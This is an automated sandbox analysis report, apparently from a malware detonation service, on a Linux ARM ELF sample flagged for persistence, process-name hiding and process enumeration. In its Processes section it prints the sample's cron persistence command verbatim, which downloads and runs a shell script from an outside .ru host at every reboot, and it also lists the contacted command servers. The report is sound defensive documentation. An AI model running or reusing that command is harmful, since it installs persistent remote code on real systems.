Malware Analysis Report

2024-11-15 08:22

Sample ID 241028-b6d4saxhnl
Target c84fca197a6c0d8da1e804407643d901.bin
SHA256 39207de2049b011a1f01695db33fec720fb0b7044a2557948cace8e12ddf6dfa
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

39207de2049b011a1f01695db33fec720fb0b7044a2557948cace8e12ddf6dfa

Threat Level: Shows suspicious behavior

The file c84fca197a6c0d8da1e804407643d901.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Enumerates running processes

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:45

Reported

2024-10-28 01:47

Platform

debian9-armhf-20240611-en

Max time kernel

150s

Max time network

143s

Command Line

[/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 194.36.144.87 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.TxaXvK /usr/bin/crontab N/A

Enumerates running processes

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/685/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/691/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/703/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/665/cmdline /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/1/cmdline /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/676/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/681/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/682/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/693/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/694/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/697/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/2/cmdline /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/689/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/700/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/708/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/671/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/686/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/690/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/692/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/699/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/704/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/705/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/680/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/673/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/674/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/688/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/706/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/mounts /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/670/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/672/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/677/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/695/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/702/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/709/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/669/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/678/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/701/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/675/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/674/cmdline /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/679/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/687/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/696/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/698/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/707/status /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A

Processes

/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf

[/tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab -]

Network

Country Destination Domain Proto
DE 194.36.144.87:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:7425 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.TxaXvK

MD5 166013c72061a26359c4b71ea7e3f82c
SHA1 22f63cee554a4e6dade457c043fb687d6843b9e7
SHA256 9ae205f20ff39c525193c69898b9fb677905ed2e6b9de9a42311135923fe96fe
SHA512 bf5812345971eed2131e77131faccf5a779ebb92bb2b628c056fa339a0d714cba6fd370b5d0db55c439eac4833d9a097867167cfb0c5c70368a5b2563b1fdc06